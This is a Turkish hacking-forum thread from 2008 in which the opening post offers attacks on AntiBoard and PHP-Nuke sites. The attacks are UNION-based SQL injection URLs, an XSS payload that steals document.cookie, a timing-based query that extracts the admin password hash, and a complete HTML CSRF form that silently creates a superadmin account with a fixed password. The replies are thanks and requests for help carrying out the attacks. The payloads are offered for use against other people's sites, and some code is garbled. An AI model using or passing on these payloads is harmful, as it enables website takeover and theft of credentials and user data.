» Forum Kuralları «
1-)
Büyük Harfle Yazı Yazmak Bağırmak Anlamına Gelmektedir..Bu Nedenle Sadece Cümle Baslarında KuLLanıLaBiLir..!
2-) Küfürler,Ahlaksız Sözler Kesinlile Yasaktır..! [Aksi Takdirde Banlanacaksınız..!
3-) Üyeleri Assalııcak Sözler Yasaktır...
4-) Yapılan Emek Kötü Dahi Olsa Önce Saygı Önce Teşekkür Sonra Eleştiri Lütfen Sağduyulu Olun..
2-) Küfürler,Ahlaksız Sözler Kesinlile Yasaktır..! [Aksi Takdirde Banlanacaksınız..!
3-) Üyeleri Assalııcak Sözler Yasaktır...
4-) Yapılan Emek Kötü Dahi Olsa Önce Saygı Önce Teşekkür Sonra Eleştiri Lütfen Sağduyulu Olun..
| Yazar | Mesaj #10205 2008-11-04 17:12 GMT | ||||||||||||||||
|
Bazı web site açıkları:
Çok basit bir sistem içinde birçok sql injection ve cross-site scripting açıkları var. /antiboard.php?thread_id=1%20UNION%20ALL%20select%2 0field%20from%20whatever--&mode=threaded&sort_order= /antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever-- /antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&sort_order=ASC&mode=threaded /antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&mode=nested&reply=1 XSS attack : script>alert(document.cookie);</script> SQL Injection açığı GwvKjox ------------------------------------------------ SQL Injection açığı 2 ke_authors ----------------------------------------------- SQL Injection açığı 3 e_users ------------------------------------------------- SQL Injection açığı 4 Bu yöntem çok eski bir yöntem ama verdiğim açıklar 2004 yılına uygundur bazı siteler için. Kod: Kod: yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999 sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz Kod: bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir admin.php yoluna ulaşmak Kod: bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir Kod: ip si/bilgisayardaki klasörün adı/ cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs Kod: code here]&thold=0 code here] modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs Kod: uper=1/**/LIMIT/**/1/* cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması Kod: sql injection açığı database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır Kod: GwvKjox admin oluşturma Kod: kullanıcı adı dropby23 şifre 12345 olur image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi Kod: kullanııc adı dropby23 şifre 12345 olur img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz search engine açığı md5 e ulaşmak devamı extradan Kod: SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1) /*" error.php açığı devamlı hata vermesini sağlar sitenin [code]http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23 yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm hazırlayın ve sadece ona tıklamanız yeterli adminsiniz Kod: <HTML> <HEAD><TITLE>Error Manager sploit</TITLE> </HEAD> <BODY bgcolor="#000000" text="#FFFFFF"> <br><br><br> <center> <FORM action="http://www.sitebibadı.com/error.php" method="POST"> <input type="hidden" name="error" value="<img width='0' height='0' border='0' src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=dropby23&add_name=God&add_pwd=12345&add_email=kala@hot.ee&add_radminsuper=1'></img>404"> <input type="submit" value="Attack"> </FORM> hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini sağlayın ve adminsiniz kullanıcı adı dropby23 şifre 12345 </center> <br><br><br> </BODY> </HTML> kolaY Gelsin
__________________
İlEtİşİm İcİN TıqLa www.pislickler.forum7.biz KaNkY'lErİm:._metallica55_.: Dj_BaR1s :. Aß!MM_:._glorious_cruel_.: ![]() ![]() ![]() tr[f] |
||||||||||||||||
| Yazar | Mesaj #10231 2008-11-04 17:24 GMT | ||||||||||||||||
|
eline sağlık kardeşim güzel paylaşım_
__________________
|
||||||||||||||||
| Yazar | Mesaj #10234 2008-11-04 17:25 GMT | ||||||||||||||||
|
Alıntı
__________________
|
||||||||||||||||
| Yazar | Mesaj #10236 2008-11-04 17:25 GMT | ||||||||||||||||
|
Alıntı
__________________
|
||||||||||||||||
| Yazar | Mesaj #10260 2008-11-04 17:46 GMT | ||||||||||||||||
|
tskkr
__________________
|
||||||||||||||||
| Yazar | Mesaj #10497 2008-11-04 20:26 GMT | ||||||||||||||||
|
eyw... kardeşim..
__________________
.. aLeMe MaRKa oLaNa eTiKeTi BiZ ÇaKaRıZ .. |
||||||||||||||||
| Yazar | Mesaj #10498 2008-11-04 20:27 GMT | ||||||||||||||||
|
eyw
__________________
probably I was knucklebone if you love someone it mustn't effect your lessons if it effects your lessons it's very bad. ...If you love someone,you should say you are knucklebone Kız dediğin istanbul gibi olmalı fethi zor fatihi tek olmalı:D |
||||||||||||||||
| Yazar | Mesaj #10499 2008-11-04 20:28 GMT | ||||||||||||||||
|
Eywallah Kardeşim ancak güncel açıklar versen yeniler için mükemmel olur
__________________
Vara Bildiğin Yere Kadar Var Yalnız ve siyah.. Uzmanlık Alanlarım:|Sosyal mühendislikk| sql injection| linux-windows root | |programmer |web dizayn |Photoshop|Xss|Bug Researchers| |
||||||||||||||||
| Yazar | Mesaj #10542 2008-11-04 21:02 GMT | ||||||||||||||||
|
ellerine sağlık
__________________
|
||||||||||||||||
|
| Yazar | Mesaj #11153 2008-11-05 16:08 GMT | ||||||||||||||||
|
kardeş bunları nasıl yapcaz yardım etseniz iii olur
__________________
uA-KADIR |
||||||||||||||||
| Yazar | Mesaj #11155 2008-11-05 16:09 GMT | ||||||||||||||||
|
Alıntı
__________________
|
||||||||||||||||
|
| Yazar | Mesaj #11175 2008-11-05 16:14 GMT | ||||||||||||||||
|
lütfen cevap
__________________
uA-KADIR |
||||||||||||||||
| Yazar | Mesaj #15038 2008-11-07 20:23 GMT | ||||||||||||||||
|
Alıntı |
||||||||||||||||











.jpg)

.gif)
.jpg)




.gif)


